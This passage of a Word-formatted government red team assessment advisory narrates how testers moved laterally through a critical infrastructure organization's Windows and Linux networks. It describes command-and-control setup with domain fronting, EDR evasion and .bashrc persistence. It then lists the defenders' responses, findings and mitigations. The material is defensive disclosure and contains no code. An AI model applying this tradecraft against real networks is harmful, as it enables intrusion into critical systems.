        <w:t>When the scheduled task executed on its own or through the red team's prompting, the DLL hijack launched a C2 implant.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2: Movement to Domain Controller Windows Command and Control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red team initially established C2 on a workstation over HTTPS before connecting to servers over SMB [T1071.002] in the organization's Windows environment. To connect to certain SBSs later in its activity, the team again relied on HTTPS for C2. Post-Exploitation Activity: Gaining Access to SBSs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the red team gained persistent access to Linux and Windows systems across the organization's networks, the team began post-exploitation activities and attempted to access SBSs. The TAs provided a scope of the organization's Classless Inter-Domain Routing (CIDR) ranges that contained SBSs. The team gained root access to multiple Linux servers in these ranges. The TAs then instructed the red team to exploit its list of primary targets: admin workstations and network ranges that included OT networks. The team only achieved access to the first two targets and did not find a path to the OT networks. While the team was able to affect the integrity of data derived from OT devices and applications, it was unable to find and access the organization's internal network where the OT devices resided.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 gain access to the SBSs, the team first gained access to Microsoft System Center Configuration Manager (SCCM) servers, which managed most of the domain's Windows systems. To access the SCCM servers, the team leveraged their AD data to identify administrators [T1087] of these targets. One of the users they previously acquired credentials for via DCSync was an administrator on the SCCM servers. The red team then used the Preferred Lateral Movement Technique to eventually authenticate to the SCCM servers. See Figure 3.</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3: Attack Path to SCCM Server Admin Workstations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first specific set of SBS targets provided by the TAs were admin workstations. These systems are used across various sensitive networks external to, or inaccessible from, the internal network where the team already had access. Normally, authorized personnel leverage these administrator workstations to perform administrator functions. CISA's red team targeted these systems in the hopes that an authorized-but unwitting- user would move the tainted system to another network, resulting in a callback from the sensitive target network.</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The red team reviewed AD data to identify these administrator systems. Through their review, the team discovered a subset of Windows workstations that could be identified with a prefix and determined a group likely to have administrative rights to the workstations.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access to the SCCM server, the red team utilized their Preferred Lateral Movement Technique to gain access to each admin workstation target (see Figure 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4: Attack Path from SCCM Server to Admin Workstations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red team maintained access to these systems for several weeks, periodically checking where they were communicating from to determine if they had moved to another network. Eventually, the team lost access to these systems without a deconfliction. To the best of the red team's knowledge, these systems either did not move to new networks or, if they did, those systems no longer had the ability to communicate with red team's C2 infrastructure. Additional Host and Other Subnets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5: Attack Path from SCCM Server to Host and Other Subnets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compromising admin workstations, the red team requested that the TAs prioritize additional systems or IP ranges. The TAs provided four CIDR ranges to target: A corporate DMZ that contained a mixture of systems and other subnets. A second subnet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>A third subnet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>An internal network that contained OT devices.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Access to the corporate DMZ was necessary to reach the second and third ranges, and the red team hoped that gaining access to these would facilitate access to the fourth range.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red team followed a familiar playbook to gain access to these SBSs from another SCCM server. First, the team performed reverse DNS lookups [T1596.001] on IP addresses within the ranges the TAs provided. They then scanned SMB port 445/TCP [T1046] from a previously compromised SCCM server to discover Windows hosts it could access on the corporate DMZ. The team discovered the server could connect to a host within the target IP range and that the system was running an outdated version of Windows Server 2012 R2. The default configuration of Windows Server 2012 R2 allows unprivileged users to query the group membership of local administrator groups. The red team discovered a user account [T1069] by querying the Windows Server 2012 R2 target that was in a database administrator group. The team leveraged its Preferred Lateral Movement Technique to authenticate to the target as that user, then repeated that technique to access a database. This database receives information from OT devices used to feed monitoring dashboards, information which factors into the organization's decision-making process [T1213].</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new host had several active connections to systems in the internal ranges of the second and third subnets. Reverse domain name system (DNS) lookup requests for these hosts failed to return any results. However, the systems were also running Windows Server 2012 R2. The red team used Windows API calls to NetLocalGroupEnum and NetLocalGroupGetMembers to query local groups [T1069.001], revealing the system names for these targets as a result. The red team performed their Preferred Lateral Movement Technique to gain access to these hosts in the second and third provided network ranges.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access to these subnets, the red team began exploring a path to systems on a private subnet where OT devices resided but failed to locate a path to that fourth subnet. Corporate Workstations of Critical Infrastructure Administrators and Operators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Next, the red team targeted the corporate workstations of the administrators and operators of the organization's critical infrastructure. Because the team lacked knowledge of the organization's OT devices and failed to discover a path to the private subnet where they resided, they instead tried to locate users that interacted with human machine interfaces (HMI). Access to such users could enable the team to access the HMI, which serves as a dashboard for OT.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red team leveraged its AD data once again, combining this data with user information from SCCM to identify targets by job role and their primary workstation. Then the team targeted the desktop of a critical infrastructure administrator, the workstation of another critical infrastructure administrator, and the workstations of three critical infrastructure operators spread across two geographically disparate sites.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AD data revealed users in a group that were administrators of all the targets. The red team then repeated their Preferred Lateral Movement Technique and identified a logged-in user connected to a "System Status and Alarm Monitoring" interface. The team discovered credentials to the interface in the user's home directory, proxied through the system, and accessed the HMI interface over HTTP. The team did not pursue further activity involving the interface because their remaining assessment time was limited. Additionally, they did not discover a way to compromise the underlying OT devices. Command and Control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team used third-party owned and operated infrastructure and services [T1583] throughout its assessment, including in certain cases for command and control (C2). The tools that the red team obtained included [T1588.002]: Sliver, Mythic, Cobalt Strike, and other commercial C2 frameworks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The team maintained multiple command and control servers hosted by several cloud vendors. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Two commercially available cloud-computing platforms.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team's servers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors use HTTPS reverse proxies to redirect C2 traffic between the target organization's network and the team servers. The team encrypted all data in transit [T1573] and secured all data at rest through a VPN with multifactor authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Content delivery network (CDN) services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>This technique leverages CDNs associated with high-reputation domains, causing malicious traffic to appear directed towards a reputational domain. However, it is redirected to red team-controlled servers. This allows the team to obfuscate some of their C2 traffic.</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team used domain fronting [T1090.004] to disguise outbound traffic, diversifying communications between the domains and the persistent beacons. This technique (which also leverages CDNs) allows the beacon to appear to connect to third-party domains but instead connects to the team's redirect server. Defense Evasion and Victim Network Defense Activities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of the encounters between the red team and network defenders occurred in the organization's Linux environment. The red team leveraged Linux tradecraft in an attempt to evade network defenses. In response, network defenders' threat hunting activities identified some of the team's presence in their Linux environment. To evade defenses, the red team reordered the process identifier (PID) of its executable processes to appear closer to the kernel and minimize the team's likelihood of detection. The team also modified its processes [T1055] by changing their names in memory and at execution. In addition, they used Python scripts [T1059.006] run in memory [T1620] to avoid on-disk detection. Some of the red team's Linux persistence techniques included modifying preexisting scripts run by the cron utility and creating backdoors through ifup-post scripts and .bashrc. Network defenders ultimately identified the team's backdoor in .bashrc [T1546.004].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Defenders also successfully detected anomalous activity on their Ansible Tower host and other systems in their Linux environment. The defenders actively analyzed NetFlow data, which helped them identify the red team's persistence and lateral movement. To mitigate the impact of the red team's tactics, network defenders would have needed to shut down a critical server as part of their incident response activities. A shut down would have resulted in downtime for hundreds of systems, including SBSs.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organization's EDR solutions largely failed to protect the organization. EDR detected only a few of the red team's payloads in the organization's Windows and Linux environments. In the instance the EDR protected the organization from the initial phishing payload, it generated an alert that network defenders neither read nor responded to. The red team excelled in bypassing EDR solutions by avoiding the use of basic "known- bad" detections the tools would capture. The team also inflated its file sizes above the upload threshold of the organization's EDR [T1027.001]. In addition, the organization completely lacked any EDR solution in a legacy environment. As such, the red team's persistence there went undetected throughout the assessment.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Network defenders failed to detect red team activity in the organization's Windows environment due to a lack of proper identity management.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Specifically, network defenders failed to detect and respond to the red team's S4U2Self, asktgs, dcsync, and golden ticket activity. Had the organization monitored for unusual activity involving AD and Kerberos, they would have detected more red team activity.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Lastly, there were significant deficiencies in the organization's DMZ that should have detected traffic into the organization's internal network over the ports used by SMB and LDAPS. Network defenders never properly implemented an intrusion detection system (IDS) or intrusion prevention system (IPS) to monitor the DMZ at the network level. This lack of implementation resulted in a failure to detect malicious network traffic through their DMZ. Further, the red team was able to move laterally through the DMZ because there was an open internal proxy with internet access that enabled the team's C2. Phase II: Red Team Measurable Events Activity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red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization's network. The red team did not have full visibility into the organization's responses to these events and lacked the support of a white team to help assess the organization's responses. See Table 1 for a description of the events, the organization's actual response, and key takeaways.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 Measurable events Measurable Event Description MITRE ATT&amp;CK Technique(s) Organization's Reported Reactions Key Takeaways Internal Port Scan Launches a scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s). Network Service Discovery [T1046] Identified an AD enumeration tool and temporarily blocked access to one C2 domain, which resulted in the red team temporarily losing access to six SCCM servers. The organization did not report identifying the port scan. In addition, with proper network segmentation, the scan's target hosts should not have been able to communicate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Comprehensive Active Directory and Host Enumeration Performs AD enumeration by querying all domain objects from the DC and enumerates trust relationships within the AD Forest, user accounts, and current session information from every domain computer (workstation and server).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Domain Trust Discovery [T1482]</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Account Discovery: Domain Account [T1087.002]</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System Owner/User Discovery [T1033]</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Remote System Discovery [T1018] Identified an AD enumeration tool and temporarily blocked access to one C2 domain, which resulted in the red team temporarily losing access to six SCCM servers. The organization did not report identifying the port scan. In addition, with proper network segmentation, the scan's target hosts should not have been able to communicate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Data Exfiltration - 1 GB of Data Sends a large amount (1GB) of mock sensitive information to an external host. Exfiltration Over Alternative Protocol [T1048] A proxy likely blocked 1GB of data exfiltration during the red team's first attempt. However, the team's second attempt was successful when they exfiltrated the data in 100MB blocks. Hours after the data exfiltration, the organization blocked the domain used for C2 and removed access to the compromised host. Organizations should implement web proxies that contain data threshold restrictions. Furthermore, network defenders need to manually analyze proxy data to determine whether there is legitimate outbound traffic or potentially malicious data exfiltration. Malicious Traffic Generation- Workstation to External Host Establishes a session that originates from a target workstation system directly to an external host over a clear text protocol, such as HTTP. Application Layer Protocol [T1071] The organization blocked access to the host and the C2 domains the red team used. The organization blocked the malicious traffic at the network level but did not appear to identify the source workstation. Active Directory Account Lockout Locks out several administrative AD accounts in rapid succession. Account Access Removal [T1531] The organization's password policy locked out the AD accounts. However, within minutes the accounts reopened, likely due to a group policy and/or an automated response. There was no identified active response from the organization. Organizations should monitor AD account activity in Windows event logs against baselines to detect anomalous and potentially malicious activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Local Admin User Account Creation (workstation) Creates a local administrator account on a target workstation system.</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Create Account: Local Account [T1136.001]</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Account Manipulation [T1098] An automated response removed the account from local administrator's group but did not delete it. Despite group policy objects removing the account, there were no detections for the activity. Local Admin User Account Creation (server) Creates a local administrator account on a target server system.</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Create Account: Local Account [T1136.001]</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Account Manipulation [T1098] An automated response removed the account from local Administrator's group but did not delete it. Despite group policy objects removing the account, there were no detections for the activity. Active Directory Account Creation Creates AD accounts and add them to domain admins group</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Create Account: Domain Account [T1136.002]</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Account Manipulation [T1098] An alert existed for this action but was disabled at the time the original event was triggered, thus it was undetected. After coordination between the TAs and red team revealed this lapse, the alert was enabled, the red team performed the action once again, and this time, TAs provided a screenshot of the alert from their monitoring dashboards. Detection tools are only useful when network defenders tune them appropriately and effectively monitor alerts. At first, the organization missed an opportunity to respond to a tool that should have produced a true positive alert because it was misconfigured.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Admin Lateral Movement-Workstation to Domain Controller and Workstation to Workstation Compromises a Domain Admin account and uses it to run PSExec on multiple workstations and domain controllers.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System Services: Service Execution [T1569.002]</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Remote Services: SMB/Windows Admin Shares [T1021.002] None identified. Detect malicious use of standard tools like PSExec that malicious cyber actors may use for lateral movement by monitoring Windows logs for anomalous activity. In addition, organizations should look for abnormal communications between workstations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Malicious Traffic Generation- Domain Controller to External Host Establishes a session that originates from a target domain controller system directly to an external host over a clear text protocol, such as HTTP. Application Layer Protocol [T1071] None identified. DCs should never connect directly to an external host over HTTP. The organization failed to detect and respond to this.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trigger Host-Based Protection- Domain Controller Uploads and executes a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts. Ingress Tool Transfer [T1105] Malicious file was removed by host-based endpoint protection system. Host based detection tools can be helpful in detecting known IOCs. However, organizations should focus on detecting anomalous behavior by monitoring their networks and hosts against good baselines. The blocking of this well-known tool on a DC should trigger an urgent investigation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ransomware Simulation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Executes simulated ransomware on multiple workstation systems to simulate a ransomware attack.</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Note: This technique does not encrypt files on the target system.</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N/A Two out of nine users reported the event to defensive staff who identified all hosts that executed the ransomware. Five users likely rebooted their systems when observing the ransomware, one logged off and on, one closed the ransomware application repeatedly and continued working, one locked their screen, and another user exited the ransomware process after two hours. Security awareness training should provide employees effective tools on how to respond to ransomware activity. LESSONS LEARNED AND KEY FINDINGS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The red team noted the following lessons learned relevant to all organizations generated from the security assessment of the organization's network. These findings contributed to the team's ability to gain persistent access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>across the organization's network. See the Mitigations section for recommendations on how to mitigate these findings. Lesson Learned: Insufficient Technical Controls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assessed organization had insufficient technical controls to prevent and detect malicious activity. The organization relied too heavily on host- based EDR solutions and did not implement sufficient network layer protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #1: The organization's perimeter network was not adequately firewalled from its internal network, which allowed the red team a path through the DMZ to internal networks. A properly configured network should block access to a path from the DMZ to other internal networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #2: The organization was too reliant on its host-based tools and lacked network layer protections, such as well-configured web proxies or intrusion prevention systems (IPS). The organization's EDR solutions also failed to catch all the red team's payloads. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection: Phishing; Kerberoasting; Generation and use of golden tickets; S4U2self abuse; Anomalous LDAP traffic; Anomalous NFS enumeration; Unconstrained Delegation server compromise; DCSync; Anomalous account usage during lateral movement; Anomalous outbound network traffic; Anomalous outbound SSH connections to the team's cloud servers from workstations; and Use of proxy servers from hosts intended to be restricted from internet access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #3: The organization had insufficient host monitoring in a legacy environment. The organization had hosts with a legacy operating system without a local EDR solution, which allowed the red team to persist for several months on the hosts undetected. Lesson Learned: Continuous Training, Support, and Resources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organization's staff requires continuous training, support, and resources to implement secure software configurations and detect malicious activity. Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure are provided sufficient resources by management to adequately protect their networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #4: The organization had multiple systems configured insecurely. This allowed the red team to compromise, maintain persistence, and further exploit those systems (i.e., access credentials, elevate privileges, and move laterally). Insecure system configurations included: Default server configurations. The organization used default configurations for hosts with Windows Server 2012 R2, which allows unprivileged users to query membership of local administrator groups. This enabled the red team to identify several standard user accounts with administrative access. Note: By default, NFS shares change the root user to the nfsnobody user, an unprivileged user account. In this way, users with local root access are prevented from gaining root level access over the mounted NFS share. Here, the organization deviated from the secure by default configuration and implemented the no_root_squash option to support a few legacy systems instead. This deviation from the default allowed the red team to escalate their privileges over the domain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled will store the Kerberos TGTs of all users that authenticate to that host. This affords threat actors the opportunity to steal TGTs, including the TGT for a domain controller, and use them to escalate their privileges over the domain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insecure Account Configuration. The organization had an account running a Linux webserver with excessive privileges. The entry for that user in the sudoers file-which controls user rights-contained paths with wildcards where that user had write access, allowing the team to escalate privileges. Note: This file should only contain specific paths to executable files that a user needs to run as another user or root, and not a wildcard. Users should not have write access over any file in the sudoers entry.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #5: The red team's activities generated security alerts that network defenders did not review. In many instances, the organization relied too heavily on known IOCs and their EDR solutions instead of conducting independent analysis of their network activity compared against baselines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #6: The organization lacked proper identity management. Because network defenders did not implement a centralized identity management system in their Linux network, they had to manually query every Linux host for artifacts related to the red team's lateral movement through SSH. Defenders also failed to detect anomalous activity in their organization's Windows environment because of poor identity management. Lesson Learned: Business Risk</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organization's leadership minimized the business risk of known attack vectors for their organization. Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk- based decision-making, miscalculated the potential impact and likelihood of its exploitation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Finding #7: The organization used known insecure and outdated software. The red team discovered software on one of the organization's web servers that was outdated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>After their operations, the red team learned the insecure and outdated software was a known security concern. The organization's security team alerted management to the risks associated this software, but management accepted the risk.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Next, the security team implemented a VDP program, which resulted in a participant exploiting the vulnerability for initial access. The VDP program helped the security team gain management support, and they implemented a web application firewall (WAF) as a compensating control. However, they did not adequately mitigate the vulnerability as they configured the WAF to be only in monitoring mode. The security team either did not have processes (or implement them properly) to scan, assess, and test whether they treated the vulnerability effectively. Additional Findings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The red team noted the following additional issues relevant to the security of the organization's network that contributed to their activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unsecured Keys and Credentials. The organization stored many private keys that lacked password protection, allowing the red team to steal the keys and use them for authentication purposes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The private key of a PFX file was not password protected, allowing the red team to use that certificate to authenticate to active directory, access UDHOST, and eventually compromise the DC. In addition, the organization did not require password protection of SSH private keys.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Note: Without a password protected key, an actor can more easily steal the private key and use it to authenticate to a system through SSH.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The organization had files in a home share that contained cleartext passwords. The accounts included, among other accounts, a system administrator.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Note: The organization appeared to store cleartext passwords in the description and user password sections of Active Directory accounts. These passwords were accessible to all domain users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Email Address Verification. The active Microsoft Office 365 configuration allows an unauthenticated external user to validate email addresses through observing error messages in the form of HTTP 302 versus HTTP 200 responses. This misconfiguration helps threat actors verify email addresses before sending phishing emails. Noted Strengths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red team noted the following technical controls or defensive measures that prevented or hampered offensive actions: Network defenders detected the initial compromise and some red team movement. After being alerted of the web shell, the organization initiated hunt activities, detected initial access, and tracked some of the red team's Phase I movements. The organization terminated much of the red team's access to the organization's internal network. Of note, once the organization's defenders discovered the red team's access, the red team spent significant time and resources continuously refortifying their access to the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Host-based EDR solutions prevented initial access by phishing. The EDR stopped the execution of multiple payloads the red team sent to a user of the organization over a week long period. The organization leveraged two products on workstations, one that was publicly discoverable and another the red team did not learn about until gaining initial access. The product the red team was unaware of, and did not test their payload against, was responsible for stopping the execution of their payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Strong domain password policy. The organization's domain password policy neutralized the red team's attempts to crack hashes and spray passwords. The team was unable to crack any hashes of all 115 service accounts it targeted.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Effective separation of privileges. The organization's administrative users had separate accounts for performing privileged actions versus routine activities. This makes privilege escalation more difficult for threat actors. MITIGATIONS Network Defenders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CISA recommends organizations implement the recommendations in Table 2 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.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2: Recommendations to Mitigate Identified Findings Finding Recommendation Insufficient Network Segmentation of DMZ Apply the principle of least privilege to limit the exposure of systems and services in the DMZ.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment the DMZ based on the sensitivity of systems and services [CPG 2.F]. Implement firewalls, access control lists, and intrusion prevention systems. Insufficient Network Monitoring Establish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques [CPG 3.A]. Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PsExec, and WMI, which are often used by malicious actors. Select one tool to administer the network, enable logging, and disable the others.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Insufficient Host Monitoring in Legacy Environment Implement an EDR solution to monitor legacy hosts for suspicious activity and to detect breaches [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
